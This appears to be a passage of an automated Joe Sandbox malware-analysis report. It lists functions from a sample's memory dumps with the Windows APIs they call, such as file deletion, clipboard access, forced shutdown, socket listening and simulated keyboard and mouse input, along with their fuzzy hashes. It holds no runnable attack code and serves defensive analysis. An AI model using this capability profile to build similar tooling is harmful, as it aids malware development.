                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EB98B8
                                          • FindClose.KERNEL32(00000000), ref: 00EB98C5
                                          • FindClose.KERNEL32(00000000), ref: 00EB98D5
                                            • Part of subcall function 00EADAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EADB00
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 2640511053-438819550
                                          • Opcode ID: c2363b867b95f64ad2523ae09c5c1e8bf9863d396c5430e6cc840b6667743050
                                          • Instruction ID: ed3aba3130f830c6eb02f0d6be297807dbd4a13ef59cc3e153c186fa3e1e084a
                                          • Opcode Fuzzy Hash: c2363b867b95f64ad2523ae09c5c1e8bf9863d396c5430e6cc840b6667743050
                                          • Instruction Fuzzy Hash: 7A31F27254161A6EDB24AFB4EC48ADF77BCDF0A364F205166EA00F20A1DB30D948DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E43AA2: GetFullPathNameW.KERNEL32 ref: 00E43AC2
                                            • Part of subcall function 00EAE199: GetFileAttributesW.KERNEL32 ref: 00EAE19A
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EAD122
                                          • DeleteFileW.KERNEL32 ref: 00EAD1DD
                                          • MoveFileW.KERNEL32 ref: 00EAD1F0
                                          • DeleteFileW.KERNEL32 ref: 00EAD20D
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAD237
                                            • Part of subcall function 00EAD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008), ref: 00EAD2B2
                                          • FindClose.KERNEL32(00000000), ref: 00EAD253
                                          • FindClose.KERNEL32(00000000), ref: 00EAD264
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 1946585618-1173974218
                                          • Opcode ID: ba7fc205b6547c51bcca324981bf54fa493701e81ee7fb1aaf12a549e0988d97
                                          • Instruction ID: 3cd9308bcbdbfe248c167277da91c0cb89bb5cad4f5cc9fd2ce2f6ef014fa0b8
                                          • Opcode Fuzzy Hash: ba7fc205b6547c51bcca324981bf54fa493701e81ee7fb1aaf12a549e0988d97
                                          • Instruction Fuzzy Hash: CB615D31C0610D9ECF05EBE0ED92AEDB7B5AF5A304F245165E4027B1A2EB346F09DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EBED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 9da623f1393b692299d7c3dbe53b0839800dcf5bfdb2a2f781dc11aca17ffbd1
                                          • Instruction ID: ded7399f6d92ae488658a5e73f8b543b15343829dab0b48a17c384bb6301141e
                                          • Opcode Fuzzy Hash: 9da623f1393b692299d7c3dbe53b0839800dcf5bfdb2a2f781dc11aca17ffbd1
                                          • Instruction Fuzzy Hash: 4D41EF30205612AFD310CF26E888B9ABBE5FF44358F24E099E425AB762C775EC41CBC0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EA170D
                                            • Part of subcall function 00EA16C3: AdjustTokenPrivileges.ADVAPI32 ref: 00EA173A
                                            • Part of subcall function 00EA16C3: GetLastError.KERNEL32 ref: 00EA174A
                                          • ExitWindowsEx.USER32(?,00000000), ref: 00EAE932
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $ $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-3163812486
                                          • Opcode ID: 4975ece6f32a3a6b1fd7ed23b818f19019c737d1c82475be0533af2deec58a2f
                                          • Instruction ID: e61f3434aae2fd4143754d1ed7b0e95a82bbdbdb8e4d2e9138c538f8ecc64f9c
                                          • Opcode Fuzzy Hash: 4975ece6f32a3a6b1fd7ed23b818f19019c737d1c82475be0533af2deec58a2f
                                          • Instruction Fuzzy Hash: 0C012632610311AFEB1422B9AC86BFB729C9B4E784F2464A2FC02FA2D1D5A07C4481A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EC1276
                                          • WSAGetLastError.WSOCK32 ref: 00EC1283
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00EC12BA
                                          • WSAGetLastError.WSOCK32 ref: 00EC12C5
                                          • closesocket.WSOCK32(00000000), ref: 00EC12F4
                                          • listen.WSOCK32(00000000,00000005), ref: 00EC1303
                                          • WSAGetLastError.WSOCK32 ref: 00EC130D
                                          • closesocket.WSOCK32(00000000), ref: 00EC133C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                          • String ID:
                                          • API String ID: 540024437-0
                                          • Opcode ID: 9d5f819410692149e0ad9b1c110e98181f675e73a8dff4899b2d38919c886681
                                          • Instruction ID: dd0dee481eea1b26f553316639560b5a868a9ee7da30f535b43d184769e20fce
                                          • Opcode Fuzzy Hash: 9d5f819410692149e0ad9b1c110e98181f675e73a8dff4899b2d38919c886681
                                          • Instruction Fuzzy Hash: A041A0356001419FD714DF24D584F29BBE5EF46318F28918DD856AF2A3C732EC86DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E5997D Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 375COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E59A4E
                                          • GetSysColor.USER32 ref: 00E59B23
                                          • SetBkColor.GDI32(?,00000000), ref: 00E59B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Color$LongProcWindow
                                          • String ID: 6ofs
                                          • API String ID: 3131106179-1294211291
                                          • Opcode ID: 213502412a30f1875ae5b618d1ba164bc9f80fc7f00d9c6b2d1653436be6ecb7
                                          • Instruction ID: e991aa8b500467bcff86a0bf8d9b0af14f6a31608b24ad48844238fbb28bfacc
                                          • Opcode Fuzzy Hash: 213502412a30f1875ae5b618d1ba164bc9f80fc7f00d9c6b2d1653436be6ecb7
                                          • Instruction Fuzzy Hash: 36A15CB0218144FEEB289A3C8C48DFB369DEB42346F15790AF942F66D3CA259D0DD275
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                          • String ID:
                                          • API String ID: 314583886-0
                                          • Opcode ID: 994b9e03b0a556bee50e43737df12220a109f4212d7a83f2ab11239ad0c7b79c
                                          • Instruction ID: d468f0c2463efc6ff6d7f69f517233c935cf313bbbe0b12fdb3351fc60f3a14a
                                          • Opcode Fuzzy Hash: 994b9e03b0a556bee50e43737df12220a109f4212d7a83f2ab11239ad0c7b79c
                                          • Instruction Fuzzy Hash: 88C12771904249AFDB21EF789C41BAABBF8EF41314F14E19AE998F7251E7308E41D750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E43AA2: GetFullPathNameW.KERNEL32 ref: 00E43AC2
                                            • Part of subcall function 00EAE199: GetFileAttributesW.KERNEL32 ref: 00EAE19A
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EAD420
                                          • DeleteFileW.KERNEL32 ref: 00EAD470
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAD481
                                          • FindClose.KERNEL32(00000000), ref: 00EAD498
                                          • FindClose.KERNEL32(00000000), ref: 00EAD4A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 2649000838-1173974218
                                          • Opcode ID: eda246a229c0365aa2ed2d573acdb73c9e790d6ae7833c3e1b999b590a68e9ff
                                          • Instruction ID: b05f46a3ac9404aaf104b11cddc43c038a40aebe69984c735607053de94f0c40
                                          • Opcode Fuzzy Hash: eda246a229c0365aa2ed2d573acdb73c9e790d6ae7833c3e1b999b590a68e9ff
                                          • Instruction Fuzzy Hash: E531727100D3459FC304EF64E8558AF77E8AE9A314F446A2DF4E2631A1EB30AA09D763
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                          • API String ID: 4168288129-2761157908
                                          • Opcode ID: c042906b44b52d05239c06e5fd8d32ccc7da0edd1f8ba3f852942a8c388dc3af
                                          • Instruction ID: 58a0f769a54dbd9bfde5d09c8e8f59e997df20bc96f32fa46e0062ab8b5b5e98
                                          • Opcode Fuzzy Hash: c042906b44b52d05239c06e5fd8d32ccc7da0edd1f8ba3f852942a8c388dc3af
                                          • Instruction Fuzzy Hash: D9C22972E086298FDB29CE28DD407EAB7B5EB49305F1491EAD44DF7241E774AE818F40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                          • String ID: .lnk
                                          • API String ID: 886957087-24824748
                                          • Opcode ID: fe8ef9693371eac7437e0c73065c1cd0df05249df03aa415dcaf6ff40f9835b7
                                          • Instruction ID: 02cd940b522b5d10f01e5dbef5662dde1e220d0bf1849d1a1ec407f7d4b10e2c
                                          • Opcode Fuzzy Hash: fe8ef9693371eac7437e0c73065c1cd0df05249df03aa415dcaf6ff40f9835b7
                                          • Instruction Fuzzy Hash: C7D159716093019FC314EF24D881DABB7E8FF98304F14596DF595AB2A2DB31E909CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00EC22E8
                                            • Part of subcall function 00EBE4EC: GetWindowRect.USER32(?,?), ref: 00EBE504
                                          • GetDesktopWindow.USER32 ref: 00EC2312
                                          • GetWindowRect.USER32(00000000), ref: 00EC2319
                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00EC2355
                                          • GetCursorPos.USER32(?), ref: 00EC2381
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EC23DF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                          • String ID:
                                          • API String ID: 2387181109-0
                                          • Opcode ID: 37a9a07ca519b937aa0d9ffbd10db3a1f52df991e58420d3fe5b8ab4b589edb2
                                          • Instruction ID: c8e071173daab4885897037d8360d8b41836da500d2418ea1a607264b72aa621
                                          • Opcode Fuzzy Hash: 37a9a07ca519b937aa0d9ffbd10db3a1f52df991e58420d3fe5b8ab4b589edb2
                                          • Instruction Fuzzy Hash: 2031DE72105346AFCB20DF19D904F9BB7A9FB88714F10191EF984A7181DA35E909CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EC304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EC307A
                                            • Part of subcall function 00EC304E: _wcslen.LIBCMT ref: 00EC309B
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EC185D
                                          • WSAGetLastError.WSOCK32 ref: 00EC1884
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00EC18DB
                                          • WSAGetLastError.WSOCK32 ref: 00EC18E6
                                          • closesocket.WSOCK32(00000000), ref: 00EC1915
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 1601658205-0
                                          • Opcode ID: f4996a1eca3ff34f356ac2be4f6ac43b42c422a45d01fbbf01928fc6e9082fff
                                          • Instruction ID: b5783655b5d5dd336b8adc63228a01c7edf4873f55daa6c4781a9d80b1151601
                                          • Opcode Fuzzy Hash: f4996a1eca3ff34f356ac2be4f6ac43b42c422a45d01fbbf01928fc6e9082fff
                                          • Instruction Fuzzy Hash: 6251E071A00200AFDB10AF24D986F2AB7E5AB45718F18948CF9057F383C771AD42CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E48060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                          • API String ID: 0-1546025612
                                          • Opcode ID: 688611b9938f8d8cfb817c40f6345a22bc7d83e6869e7e19ae9150cbacae0f63
                                          • Instruction ID: f0e7da436bc44c66b1d1775b697bfc4a048daea386c54bd7bbe5877b18365af5
                                          • Opcode Fuzzy Hash: 688611b9938f8d8cfb817c40f6345a22bc7d83e6869e7e19ae9150cbacae0f63
                                          • Instruction Fuzzy Hash: C0A28C71A0021ACBDF24DF58D9407EEB7B1BB54318F2491AAE81DB7285EB749D81CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E64CE8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID: (
                                          • API String ID: 1703294689-2063206799
                                          • Opcode ID: b5860e9e460eb4ceea710090459c600ffbc555e125f38bdedb824db3c44d2c11
                                          • Instruction ID: 4134db315a9462d3e302e5a3d5ab8be46796b55628e27341bbf3d3b8cd90d96b
                                          • Opcode Fuzzy Hash: b5860e9e460eb4ceea710090459c600ffbc555e125f38bdedb824db3c44d2c11
                                          • Instruction Fuzzy Hash: 91E0B6B1441149AFCF11AF65FD09A583B69EB417C5F209055FC09AB162CB35DD46DA80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ECA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00ECA6AC
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00ECA6BA
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00ECA79C
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECA7AB
                                            • Part of subcall function 00E5CE60: CompareStringW.KERNEL32 ref: 00E5CE8A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                          • String ID:
                                          • API String ID: 1991900642-0
                                          • Opcode ID: 86689b44a962f8330796e0dbfe5574bf197d1120d9ceb25920ee88e861701031
                                          • Instruction ID: 78e3bbbdce3cd18381c443bedbadbf74291c25bc87c9c8e9f877c29257eb3706
                                          • Opcode Fuzzy Hash: 86689b44a962f8330796e0dbfe5574bf197d1120d9ceb25920ee88e861701031
                                          • Instruction Fuzzy Hash: A3517B71508300AFD314EF24D886E6BBBE8FF89754F04592DF985A7262EB31D905CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00EAAAAC
                                          • SetKeyboardState.USER32(00000080), ref: 00EAAAC8
                                          • PostMessageW.USER32 ref: 00EAAB36
                                          • SendInput.USER32(00000001,?,0000001C), ref: 00EAAB88
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 5a9c2462101e06a0ae1594722ff01e83c2344e1124dba40515f6a2633883d44c
